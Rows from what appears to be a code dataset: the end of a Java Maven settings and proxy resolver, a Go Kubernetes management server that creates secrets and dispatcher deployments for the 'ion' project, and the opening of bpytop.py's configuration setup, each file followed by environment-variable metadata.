}
}
}
}
return get(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY);
}
public MavenRepositoryURL getDefaultLocalRepository() {
if (settings != null) {
String spec = settings.getLocalRepository();
if (spec == null) {
spec = System.getProperty("user.home") + "/.m2/repository";
}
if (!spec.toLowerCase().contains("@snapshots")) {
spec += "@snapshots";
}
spec += "@id=defaultlocal";
// check if we have a valid url
try {
return new MavenRepositoryURL(spec);
}
catch (MalformedURLException e) {
// maybe is just a file?
try {
return new MavenRepositoryURL(new File(spec).toURI().toASCIIString());
}
catch (MalformedURLException ignore) {
LOGGER.warn("Local repository [" + spec
+ "] cannot be used and will be skipped");
return null;
}
}
}
return null;
}
public Integer getTimeout() {
if (!contains(m_pid + ServiceConstants.PROPERTY_TIMEOUT)) {
String timeout = m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_TIMEOUT);
return set(m_pid + ServiceConstants.PROPERTY_TIMEOUT,
Integer.valueOf(timeout == null ? DEFAULT_TIMEOUT : timeout));
}
return get(m_pid + ServiceConstants.PROPERTY_TIMEOUT);
}
/**
* {@inheritDoc}
*/
public Boolean useFallbackRepositories() {
if (!contains(m_pid + ServiceConstants.PROPERTY_USE_FALLBACK_REPOSITORIES)) {
String useFallbackRepoProp = m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_USE_FALLBACK_REPOSITORIES);
return set(m_pid + ServiceConstants.PROPERTY_USE_FALLBACK_REPOSITORIES,
Boolean.valueOf(useFallbackRepoProp == null ? "true" : useFallbackRepoProp));
}
return get(m_pid + ServiceConstants.PROPERTY_USE_FALLBACK_REPOSITORIES);
}
/**
* Enables the proxy server for a given URL.
*
* @deprecated This method has side-effects and is only used in the "old" resolver.
*/
public void enableProxy(URL url) {
final String protocol = url.getProtocol();
Map<String, String> proxyDetails = getProxySettings(url.getProtocol()).get(protocol);
if (proxyDetails != null) {
LOGGER.trace("Enabling proxy [" + proxyDetails + "]");
final String user = proxyDetails.get("user");
final String pass = proxyDetails.get("pass");
Authenticator.setDefault(new Authenticator() {
@Override
protected PasswordAuthentication getPasswordAuthentication() {
return new PasswordAuthentication(user, pass.toCharArray());
}
});
System.setProperty(protocol + ".proxyHost", proxyDetails.get("host"));
System.setProperty(protocol + ".proxyPort", proxyDetails.get("port"));
System.setProperty(protocol + ".nonProxyHosts", proxyDetails.get("nonProxyHosts"));
set(m_pid + ServiceConstants.PROPERTY_PROXY_SUPPORT, protocol);
}
}
private boolean isProtocolSupportEnabled(String... protocols) {
final String proxySupport = m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_PROXY_SUPPORT);
if (proxySupport == null) {
return ServiceConstants.PROPERTY_PROXY_SUPPORT_DEFAULT;
}
// simple cases:
if ("true".equalsIgnoreCase(proxySupport)) {
return true;
}
if ("false".equalsIgnoreCase(proxySupport)) {
return false;
}
// giving no protocols to test against, default to true.
if (protocols.length == 0) {
return true;
}
// differentiate by protocol:
for (String protocol : protocols) {
if (proxySupport.contains(protocol)) {
return true;
}
}
// not in list appearingly.
return false;
}
/**
* @deprecated
* @param protocols protocols to be recognized.
*
* @return
*/
public Map<String, Map<String, String>> getProxySettings(String... protocols) {
Map<String, Map<String, String>> pr = new HashMap<String, Map<String, String>>();
if (isProtocolSupportEnabled(protocols)) {
parseSystemWideProxySettings(pr);
parseProxiesFromProperty(
m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_PROXIES), pr);
// if( pr.isEmpty() ) {
// if( m_settings == null ) { return Collections.emptyMap(); }
//
// return m_settings.getProxySettings();
// }
}
return pr;
}
/**
* @deprecated
* @param pr
*/
private void parseSystemWideProxySettings(Map<String, Map<String, String>> pr) {
String httpHost = m_propertyResolver.get("http.proxyHost");
String httpPort = m_propertyResolver.get("http.proxyPort");
String httpnonProxyHosts = m_propertyResolver.get("http.nonProxyHosts");
if (httpHost != null) {
parseProxiesFromProperty("http:host=" + httpHost + ",port=" + httpPort
+ ",nonProxyHosts=" + httpnonProxyHosts, pr);
}
}
/**
* @deprecated
* @param proxySettings
* @param pr
*/
// example: http:host=foo,port=8080;https:host=bar,port=9090
private void parseProxiesFromProperty(String proxySettings, Map<String, Map<String, String>> pr) {
// TODO maybe make the parsing more clever via regex ;) Or not.
try {
if (proxySettings != null) {
String[] protocols = proxySettings.split(";");
for (String protocolSection : protocols) {
String[] section = protocolSection.split(":");
String protocolName = section[0];
Map<String, String> keyvalue = new HashMap<String, String>();
// set some defaults:
keyvalue.put("protocol", protocolName);
keyvalue.put("nonProxyHosts", "");
keyvalue.put("host", "localhost");
keyvalue.put("port", "80");
for (String keyvalueList : section[1].split(",")) {
String[] kv = keyvalueList.split("=");
String key = kv[0];
String value = kv[1];
keyvalue.put(key, value);
}
pr.put(protocolName, keyvalue);
}
}
}
catch (ArrayIndexOutOfBoundsException ex) {
throw new IllegalArgumentException(
"Proxy setting is set to "
+ proxySettings
+ ". But it should have this format: <protocol>:<key>=<value>,<key=value>;protocol:<key>=<value>,..");
}
}
private String getSettingsPath() {
URL url = getSettingsFileUrl();
return url == null ? null : url.getPath();
}
private String getLocalRepoPath(PropertyResolver props) {
return props.get(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY);
}
private Settings buildSettings(String localRepoPath, String settingsPath,
boolean useFallbackRepositories) {
Settings settings;
if (settingsPath == null) {
settings = new Settings();
}
else {
DefaultSettingsBuilderFactory factory = new DefaultSettingsBuilderFactory();
DefaultSettingsBuilder builder = factory.newInstance();
SettingsBuildingRequest request = new DefaultSettingsBuildingRequest();
request.setUserSettingsFile(new File(settingsPath));
try {
SettingsBuildingResult result = builder.build(request);
settings = result.getEffectiveSettings();
}
catch (SettingsBuildingException exc) {
throw new AssertionError("cannot build settings", exc);
}
}
if (useFallbackRepositories) {
Profile fallbackProfile = new Profile();
Repository central = new Repository();
central.setId("central");
central.setUrl("http://repo1.maven.org/maven2");
fallbackProfile.setId("fallback");
fallbackProfile.setRepositories(Arrays.asList(central));
settings.addProfile(fallbackProfile);
settings.addActiveProfile("fallback");
}
if (localRepoPath != null) {
settings.setLocalRepository(localRepoPath);
}
return settings;
}
public Map<String, Map<String, String>> getMirrors() {
// DO support mirrors via properties (just like we do for proxies.
// if( m_settings == null ) { return Collections.emptyMap(); }
// return m_settings.getMirrorSettings();
return Collections.emptyMap();
}
public Settings getSettings() {
return settings;
}
public void setSettings(Settings settings) {
this.settings = settings;
}
public String getSecuritySettings() {
String key = m_pid + ServiceConstants.PROPERTY_SECURITY;
if (!contains(key)) {
String spec = m_propertyResolver.get(key);
if (spec == null) {
spec = new File(System.getProperty("user.home"), ".m2/settings-security.xml")
.getPath();
}
return set(key, spec);
}
return get(key);
}
@Override
public <T> T getProperty(String name, T defaultValue, Class<T> clazz) {
if (!contains(m_pid + name)) {
String value = m_propertyResolver.get(m_pid + name);
return set(m_pid + name, value == null ? defaultValue : convert(value, clazz));
}
return get(m_pid + name);
}
@Override
public String getPid() {
return m_pid;
}
/**
* Supports String to [ Integer, Long, String, Boolean ] conversion
* @param value
* @param clazz
* @param <T>
* @return
*/
@SuppressWarnings("unchecked")
private <T> T convert(String value, Class<T> clazz) {
if (String.class == clazz) {
return (T) value;
}
if (Integer.class == clazz) {
return (T) Integer.valueOf(value);
}
if (Long.class == clazz) {
return (T) Long.valueOf(value);
}
if (Boolean.class == clazz) {
return (T) Boolean.valueOf("true".equals(value));
}
throw new IllegalArgumentException("Can't convert \"" + value + "\" to " + clazz + ".");
}
}
| [
"\"M2_HOME\""
]
| []
| [
"M2_HOME"
]
| [] | ["M2_HOME"] | java | 1 | 0 | |
internal/app/management/servers/kubernetes.go | //nolint: golint
package servers
import (
"encoding/base64"
"fmt"
"github.com/lawrencegripper/ion/internal/app/management/types"
"github.com/lawrencegripper/ion/internal/pkg/management/module"
"github.com/rs/xid"
log "github.com/sirupsen/logrus"
context "golang.org/x/net/context"
"k8s.io/apimachinery/pkg/api/errors"
"strconv"
"strings"
appsv1 "k8s.io/api/apps/v1"
apiv1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"os"
"path/filepath"
)
//Check at compile time if we implement the interface
var _ module.ModuleServiceServer = (*Kubernetes)(nil)
// Kubernetes management server
type Kubernetes struct {
client *kubernetes.Clientset
namespace string
AzureSPSecretRef string
AzureBlobStorageSecretRef string
AzureServiceBusSecretRef string
MongoDBSecretRef string
DispatcherImageName string
ID string
}
const createdByLabel = "ion/createdBy"
const moduleNameLabel = "ion/moduleName"
const idLabel = "ion/id"
var sharedServicesSecretName string
var sharedImagePullSecretName string
var logLevel string
func genID() string {
id := xid.New()
return id.String()[0:5]
}
// NewKubernetesManagementServer creates and initializes a new Kubernetes management server
func NewKubernetesManagementServer(config *types.Configuration) (*Kubernetes, error) {
k := Kubernetes{}
logLevel = config.LogLevel
k.ID = "management-api"
k.DispatcherImageName = config.DispatcherImage
var err error
k.client, err = getClientSet()
if err != nil {
return nil, fmt.Errorf("error connecting to Kubernetes %+v", err)
}
k.namespace = config.Namespace
err = k.createSharedServicesSecret(config)
if err != nil {
return nil, err
}
err = k.createSharedImagePullSecret(config)
if err != nil {
return nil, err
}
return &k, nil
}
// createSharedServicesSecret creates a shared secret
// that stores all the config needed by the dispatcher
// to operate i.e. dataplane provider connection
func (k *Kubernetes) createSharedServicesSecret(config *types.Configuration) error {
sharedServicesSecretName = fmt.Sprintf("services-%s", k.ID)
secret := &apiv1.Secret{
ObjectMeta: metav1.ObjectMeta{
Name: sharedServicesSecretName,
Labels: map[string]string{
createdByLabel: k.ID,
},
},
StringData: map[string]string{
"CLIENTID": config.AzureClientID,
"CLIENTSECRET": config.AzureClientSecret,
"SUBSCRIPTIONID": config.AzureSubscriptionID,
"TENANTID": config.AzureTenantID,
"SERVICEBUSNAMESPACE": config.AzureServiceBusNamespace,
"RESOURCEGROUP": config.AzureResourceGroup,
"AZUREBATCH_JOBID": config.AzureBatchJobID,
"AZUREBATCH_POOLID": config.AzureBatchPoolID,
"AZUREBATCH_BATCHACCOUNTLOCATION": config.AzureBatchAccountLocation,
"AZUREBATCH_BATCHACCOUNTNAME": config.AzureBatchAccountName,
"AZUREBATCH_REQUIRESGPU": strconv.FormatBool(config.AzureBatchRequiresGPU),
"AZUREBATCH_RESOURCEGROUP": config.AzureBatchResourceGroup,
"AZUREBATCH_IMAGEREPOSITORYSERVER": config.AzureBatchImageRepositoryServer,
"AZUREBATCH_IMAGEREPOSITORYPASSWORD": config.AzureBatchImageRepositoryPassword,
"AZUREBATCH_IMAGEREPOSITORYUSERNAME": config.AzureBatchImageRepositoryUsername,
"HANDLER_MONGODBDOCPROVIDER_PORT": strconv.Itoa(config.MongoDBPort),
"HANDLER_MONGODBDOCPROVIDER_NAME": config.MongoDBName,
"HANDLER_MONGODBDOCPROVIDER_PASSWORD": config.MongoDBPassword,
"HANDLER_MONGODBDOCPROVIDER_COLLECTION": config.MongoDBCollection,
"HANDLER_AZUREBLOBPROVIDER_BLOBACCOUNTNAME": config.AzureStorageAccountName,
"HANDLER_AZUREBLOBPROVIDER_BLOBACCOUNTKEY": config.AzureStorageAccountKey,
"LOGGING_APPINSIGHTS": config.AppInsightsKey,
},
}
if err := k.createSecretIfNotExist(secret); err != nil {
return err
}
return nil
}
// createSharedImagePullSecret creates a shared secrect to store
// the module container registry connection details if they
// are provided. These will be used by the dispatcher to pull
// the module image.
func (k *Kubernetes) createSharedImagePullSecret(config *types.Configuration) error {
sharedImagePullSecretName = fmt.Sprintf("imagepull-%s", k.ID)
if config.ContainerImageRegistryUsername != "" &&
config.ContainerImageRegistryPassword != "" &&
config.ContainerImageRegistryURL != "" {
auth := encodeBase64(fmt.Sprintf("%s:%s", config.ContainerImageRegistryUsername, config.ContainerImageRegistryPassword))
dockerAuthConfig := fmt.Sprintf(`{"auths":{"%s":{"username":"%s","password":"%s","email":"%s","auth":"%s"}}}`,
config.ContainerImageRegistryURL,
config.ContainerImageRegistryUsername,
config.ContainerImageRegistryPassword,
config.ContainerImageRegistryEmail,
auth)
secret := &apiv1.Secret{
ObjectMeta: metav1.ObjectMeta{
Name: sharedImagePullSecretName,
Labels: map[string]string{
createdByLabel: k.ID,
},
},
Data: map[string][]byte{
".dockerconfigjson": []byte(dockerAuthConfig),
},
Type: apiv1.SecretTypeDockerConfigJson,
}
if err := k.createSecretIfNotExist(secret); err != nil {
return err
}
}
return nil
}
func (k *Kubernetes) createSecretIfNotExist(secret *apiv1.Secret) error {
secretsClient := k.client.CoreV1().Secrets(k.namespace)
_, err := secretsClient.Get(secret.Name, metav1.GetOptions{})
if errors.IsNotFound(err) {
fmt.Printf("secret %s not found, creating it\n", secret.Name)
_, err := secretsClient.Create(secret)
if err != nil {
return fmt.Errorf("error creating dispatcher secret %+v", err)
}
} else if statusError, isStatus := err.(*errors.StatusError); isStatus {
return fmt.Errorf("error getting secret %s: %v\n", secret.Name, statusError.ErrStatus.Message)
} else if err != nil {
return err
}
return nil
}
// Create will create the necessary services to support the execution of
// a module. This includes a configmap to hold the module's configuration
// and a deployment that runs a disptcher pod. The dispatcher pod will
// orchestrate the execution of the module itself.
func (k *Kubernetes) Create(ctx context.Context, r *module.ModuleCreateRequest) (*module.ModuleCreateResponse, error) {
// a unique ID for this creation
id := fmt.Sprintf("%s-%s", r.Modulename, genID())
// Create a configmap to store the configuration details
// needed by the module. These will be mounted into the
// dispatcher as a volume and then passed on when it
// dispatches the module.
moduleConfigMapName := id
var stringBuilder strings.Builder
for k, v := range r.Configmap {
_, _ = stringBuilder.WriteString(fmt.Sprintf("%s=%s\n", k, v))
}
configMapStr := strings.TrimSuffix(stringBuilder.String(), "\n")
moduleConfigMap := &apiv1.ConfigMap{
ObjectMeta: metav1.ObjectMeta{
Name: moduleConfigMapName,
Labels: map[string]string{
createdByLabel: k.ID,
idLabel: id,
moduleNameLabel: r.Modulename,
},
},
Data: map[string]string{
"module": configMapStr,
},
}
configMapClient := k.client.CoreV1().ConfigMaps(k.namespace)
_, err := configMapClient.Create(moduleConfigMap)
if err != nil {
return nil, fmt.Errorf("error creating module config map %+v", err)
}
configMapFilePath := "/etc/config"
useAzureBatchProvider := false
if r.Provider == "azurebatch" {
useAzureBatchProvider = true
}
// Create an argument list to provide the the dispatcher binary
dispatcherArgs := []string{
"start",
"--modulename=" + r.Modulename,
"--moduleconfigpath=" + fmt.Sprintf("%s/module", configMapFilePath),
"--subscribestoevent=" + r.Eventsubscriptions,
"--eventspublished=" + r.Eventpublications,
"--azurebatch.enabled=" + strconv.FormatBool(useAzureBatchProvider),
"--job.workerimage=" + r.Moduleimage,
"--job.handlerimage=" + r.Handlerimage,
"--job.retrycount=" + fmt.Sprintf("%d", r.Retrycount),
"--job.pullalways=false",
"--kubernetes.namespace=" + k.namespace,
"--kubernetes.imagepullsecretname=" + sharedImagePullSecretName,
"--loglevel=" + logLevel,
"--printconfig=true",
}
dispatcherDeploymentName := id
// Create a deployment that runs a dispatcher
// pod, passing in environment variables from
// a secret and mounting a volume from a configmap.
deployment := &appsv1.Deployment{
ObjectMeta: metav1.ObjectMeta{
Name: dispatcherDeploymentName,
Labels: map[string]string{
createdByLabel: k.ID,
idLabel: dispatcherDeploymentName,
moduleNameLabel: r.Modulename,
},
},
Spec: appsv1.DeploymentSpec{
Replicas: int32Ptr(r.Instancecount),
Selector: &metav1.LabelSelector{
MatchLabels: map[string]string{
"app": "ion-dispatcher",
},
},
Template: apiv1.PodTemplateSpec{
ObjectMeta: metav1.ObjectMeta{
Name: dispatcherDeploymentName,
Labels: map[string]string{
"app": "ion-dispatcher",
},
},
Spec: apiv1.PodSpec{
Containers: []apiv1.Container{
{
Name: "ion-dispatcher",
Image: k.DispatcherImageName,
Args: dispatcherArgs,
EnvFrom: []apiv1.EnvFromSource{
{
SecretRef: &apiv1.SecretEnvSource{
LocalObjectReference: apiv1.LocalObjectReference{
Name: sharedServicesSecretName,
},
},
},
},
VolumeMounts: []apiv1.VolumeMount{
{
Name: "module-config",
MountPath: configMapFilePath,
},
},
},
},
Volumes: []apiv1.Volume{
{
Name: "module-config",
VolumeSource: apiv1.VolumeSource{
ConfigMap: &apiv1.ConfigMapVolumeSource{
LocalObjectReference: apiv1.LocalObjectReference{
Name: moduleConfigMapName,
},
},
},
},
},
},
},
},
}
deploymentsClient := k.client.AppsV1().Deployments(k.namespace)
_, err = deploymentsClient.Create(deployment)
if err != nil {
return nil, fmt.Errorf("error creating dispatcher deployment %+v", err)
}
var createResponse = &module.ModuleCreateResponse{
Name: id,
}
return createResponse, nil
}
// Delete will delete all the components associated with a module deployment.
// This includes deleting the configmap that holds the module's configuration
// and the deployment of the module's dispatcher.
func (k *Kubernetes) Delete(ctx context.Context, r *module.ModuleDeleteRequest) (*module.ModuleDeleteResponse, error) {
// Find deployments with matching label and delete them
deploymentsClient := k.client.AppsV1().Deployments(k.namespace)
deployments, err := deploymentsClient.List(metav1.ListOptions{
LabelSelector: fmt.Sprintf("%s=%s", idLabel, r.Name),
})
if err != nil {
return nil, fmt.Errorf("error listing deployments with name %s", r.Name)
}
for _, deployment := range deployments.Items {
if err := deploymentsClient.Delete(deployment.Name, nil); err != nil {
return nil, fmt.Errorf("error deleting deployment %s", deployment.Name)
}
}
// Find configmaps with matching label and delete them
configMapClient := k.client.CoreV1().ConfigMaps(k.namespace)
configmaps, err := configMapClient.List(metav1.ListOptions{
LabelSelector: fmt.Sprintf("%s=%s", idLabel, r.Name),
})
if err != nil {
return nil, fmt.Errorf("error listing configmaps with name %s", r.Name)
}
for _, configmap := range configmaps.Items {
if err := configMapClient.Delete(configmap.Name, nil); err != nil {
return nil, fmt.Errorf("error deleting configmap %s", configmap.Name)
}
}
var deleteResponse = &module.ModuleDeleteResponse{
Name: r.Name,
}
return deleteResponse, nil
}
// List will list all the deployments that have been created by this
// management server. It will simply list the deployment modules name.
func (k *Kubernetes) List(ctx context.Context, r *module.ModuleListRequest) (*module.ModuleListResponse, error) {
// Find deployments with matching label
deploymentsClient := k.client.AppsV1().Deployments(k.namespace)
deployments, err := deploymentsClient.List(metav1.ListOptions{
LabelSelector: fmt.Sprintf("%s=%s", createdByLabel, k.ID),
})
if err != nil {
return nil, fmt.Errorf("error listing deployments with label %s", k.ID)
}
var list = &module.ModuleListResponse{}
for _, deployment := range deployments.Items {
list.Names = append(list.Names, deployment.Name)
}
return list, nil
}
// Get will get information about a deployed module
func (k *Kubernetes) Get(ctx context.Context, r *module.ModuleGetRequest) (*module.ModuleGetResponse, error) {
// Get the deployment with the given name
deploymentsClient := k.client.AppsV1().Deployments(k.namespace)
deployment, err := deploymentsClient.Get(r.Name, metav1.GetOptions{})
if err != nil {
return nil, fmt.Errorf("error getting deployments with name %s", r.Name)
}
var getResponse = &module.ModuleGetResponse{
Name: deployment.Name,
Status: string(deployment.Status.Conditions[0].Type),
StatusMessage: deployment.Status.Conditions[0].Message,
}
return getResponse, nil
}
func encodeBase64(s string) string {
const lineLen = 70
encLen := base64.StdEncoding.EncodedLen(len(s))
lines := encLen/lineLen + 1
buf := make([]byte, encLen*2+lines)
in := buf[0:encLen]
out := buf[encLen:]
base64.StdEncoding.Encode(in, []byte(s))
k := 0
for i := 0; i < len(in); i += lineLen {
j := i + lineLen
if j > len(in) {
j = len(in)
}
k += copy(out[k:], in[i:j])
if lines > 1 {
out[k] = '\n'
k++
}
}
return string(out[:k])
}
func homeDir() string {
if h := os.Getenv("HOME"); h != "" {
return h
}
return os.Getenv("USERPROFILE") // windows
}
func getClientSet() (*kubernetes.Clientset, error) {
config, err := rest.InClusterConfig()
if err != nil {
log.WithError(err).Warn("failed getting in-cluster config attempting to use kubeconfig from homedir")
var kubeconfig string
if home := homeDir(); home != "" {
kubeconfig = filepath.Join(home, ".kube", "config")
}
if _, err := os.Stat(kubeconfig); os.IsNotExist(err) {
log.WithError(err).Panic("kubeconfig not found in homedir")
}
// use the current context in kubeconfig
config, err = clientcmd.BuildConfigFromFlags("", kubeconfig)
if err != nil {
log.WithError(err).Panic("getting kubeconf from current context")
return nil, err
}
}
// create the clientset
clientset, err := kubernetes.NewForConfig(config)
if err != nil {
log.WithError(err).Error("Getting clientset from config")
return nil, err
}
return clientset, nil
}
func int32Ptr(i int32) *int32 { return &i }
| [
"\"HOME\"",
"\"USERPROFILE\""
]
| []
| [
"HOME",
"USERPROFILE"
]
| [] | ["HOME", "USERPROFILE"] | go | 2 | 0 | |
bpytop.py | #!/usr/bin/env python3
# pylint: disable=not-callable, no-member, unsubscriptable-object
# indent = tab
# tab-size = 4
# Copyright 2021 Aristocratos ([email protected])
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, io, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, tzset
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Dict, Tuple, Union, Any, Iterable
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print("ERROR!")
print("\n".join(errors))
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.68"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-b", "--boxes", action="store", dest="boxes", help = "which boxes to show at start, example: -b \"cpu mem net proc\"")
args.add_argument("-lc", "--low-color", action="store_true", help = "disable truecolor, converts 24-bit colors to 256-color")
args.add_argument("-v", "--version", action="store_true", help = "show version info and exit")
args.add_argument("--debug", action="store_true", help = "start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_BOXES: str = stdargs.boxes
LOW_COLOR: bool = stdargs.low_color
DEBUG: bool = stdargs.debug
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Sets if 24-bit truecolor should be used, will convert 24-bit colors to 256 color (6x6x6 color cube) if false.
truecolor=$truecolor
#* Manually set which boxes to show. Available values are "cpu mem net proc", separate values with whitespace.
shown_boxes="$shown_boxes"
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes update multiplier, sets how often the process list is updated as a multiplier of "update_ms".
#* Set to 2 or higher to greatly decrease bpytop cpu usage. (Only integers)
proc_update_mult=$proc_update_mult
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Sets the CPU stat shown in upper half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_upper="$cpu_graph_upper"
#* Sets the CPU stat shown in lower half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_lower="$cpu_graph_lower"
#* Toggles if the lower CPU graph should be inverted.
cpu_invert_lower=$cpu_invert_lower
#* Set to True to completely disable the lower CPU graph.
cpu_single_graph=$cpu_single_graph
#* Shows the system uptime in the CPU box.
show_uptime=$show_uptime
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors has been found
show_coretemp=$show_coretemp
#* Which temperature scale to use, available values: "celsius", "fahrenheit", "kelvin" and "rankine"
temp_scale="$temp_scale"
#* Show CPU frequency, can cause slowdowns on certain systems with some versions of psutil
show_cpu_freq=$show_cpu_freq
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",".
#* Begin line with "exclude=" to change to exclude filter, otherwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Filter out non physical disks. Set this to False to include network disks, RAM disks and similar.
only_physical=$only_physical
#* Read disks list from /etc/fstab. This also disables only_physical.
use_fstab=$use_fstab
#* Toggles if io stats should be shown in regular disk usage view
show_io_stat=$show_io_stat
#* Toggles io mode for disks, showing only big graphs for disk read/write speeds.
io_mode=$io_mode
#* Set to True to show combined read/write io graphs in io mode.
io_graph_combined=$io_graph_combined
#* Set the top speed for the io graphs in MiB/s (10 by default), use format "device:speed" separate disks with a comma ",".
#* Example: "/dev/sda:100, /dev/sdb:20"
io_graph_speeds="$io_graph_speeds"
#* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwidth usage or auto scale, bandwidth usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Starts with the Network Interface specified here.
net_iface="$net_iface"
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetical
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
elif os.path.isdir(f'{os.path.dirname(__file__)}/themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "#00",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
